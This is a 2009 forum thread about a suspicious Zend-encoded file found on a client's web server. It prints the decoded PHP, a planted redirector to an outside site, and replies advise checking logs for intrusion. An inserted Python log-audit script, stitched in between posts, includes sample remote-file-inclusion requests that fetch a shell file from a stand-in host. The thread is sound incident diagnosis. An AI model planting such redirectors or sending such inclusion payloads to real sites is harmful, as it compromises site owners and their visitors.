Hacked? Weird zend encoded file on my server

Discussion in 'Security' started by jkashu, Jun 27, 2009.

  1. #1
    I found a weird file on a client's server while making website updates. The website is just a static HTML site except for a PHP contact-us form (no file uploads or anything); the contact-us form writes to a text file.

    Anyway, the weird file was Zend encoded. Using showmycode.com I decoded it; the result was:

    <?php
    // Decoded payload (originally Zend-encoded). It is a pure redirector:
    // a request with "?delete" is sent to remove.html on an external site,
    // any other request is sent to the root of that same site.
    if ( getenv( "QUERY_STRING" ) == "delete" )
    {
        header( "Location: http://lesbiansportal.imess.net/remove.html" );
    }
    else
    {
        header( "Location: http://lesbiansportal.imess.net/" );
    }
    ?>

    Thoughts? Nothing else is weird on the site and, looking at AWStats, no one has ever gone to this page.
     
    jkashu, Jun 27, 2009 IP
  2. thr3146

    #2
    Does it redirect? Try clearing the cache and see.
     
    thr3146, Jun 27, 2009 IP
  3. thr3146

    #3
    Does it redirect? Try clearing the cache and see; you may be seeing the old page.
     
    thr3146, Jun 27, 2009 IP
  4. jkashu

    #4
    The page redirects to the lesbianportal site. I don't know what would happen if I added ?delete to the URL.
     
    jkashu, Jun 27, 2009 IP
  5. SteveWh

    #5
    Check FTP log for unauthorized FTP accesses. Check HTTP log for RFI attacks that might have injected code into pages.
     
    SteveWh, Jun 29, 2009 IP
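A minimal offline version of the two log checks SteveWh suggests, written for this thread rather than taken from it: the access-log parser flags query parameters whose value is a remote URL (the classic RFI fingerprint), and the xferlog parser lists FTP uploads from addresses not on a known-good list. The log lines, IPs and hostnames below are constructed placeholders, not data from the poster's server.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log lines (placeholder IPs/hosts, not from the thread).
ACCESS_LOG = """\
203.0.113.5 - - [27/Jun/2009:03:12:44 +0000] "GET /contact.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Jun/2009:03:13:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Jun/2009:03:13:20 +0000] "GET /contact.php?page=ftp://evil.example/x.txt HTTP/1.1" 200 512 "-" "curl/7.19"
"""

# Constructed xferlog-style FTP transfer lines; the 12th field is the direction ("i" = upload to server).
XFER_LOG = """\
Sat Jun 27 02:58:10 2009 1 203.0.113.5 1432 /var/www/html/images/ad.php b _ i r webuser ftp 0 * c
Fri Jun 26 18:00:00 2009 3 192.0.2.10 20480 /var/www/html/index.html b _ i r webuser ftp 0 * c
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def find_rfi_requests(log_text):
    """Return (ip, path, param) for each request whose query parameter value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not well-formed request entries
        url = urlparse(m.group("target"))
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            if any(REMOTE_URL_RE.match(v) for v in values):
                hits.append((m.group("ip"), url.path, param))
    return hits


def find_ftp_uploads(log_text, trusted_ips):
    """Return (ip, filename) for each upload whose source address is not in trusted_ips."""
    uploads = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue  # not a complete xferlog record
        ip, filename, direction = f[6], f[8], f[11]
        if direction == "i" and ip not in trusted_ips:
            uploads.append((ip, filename))
    return uploads
```

Run against real logs, a hit in either list gives you a timestamp to line up with the file's mtime, which is what turns "weird file" into a known entry point.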
  6. SSANZ

    #6
    Find the vulnerability first, otherwise you're going to be running around in circles.
     
    SSANZ, Jun 29, 2009 IP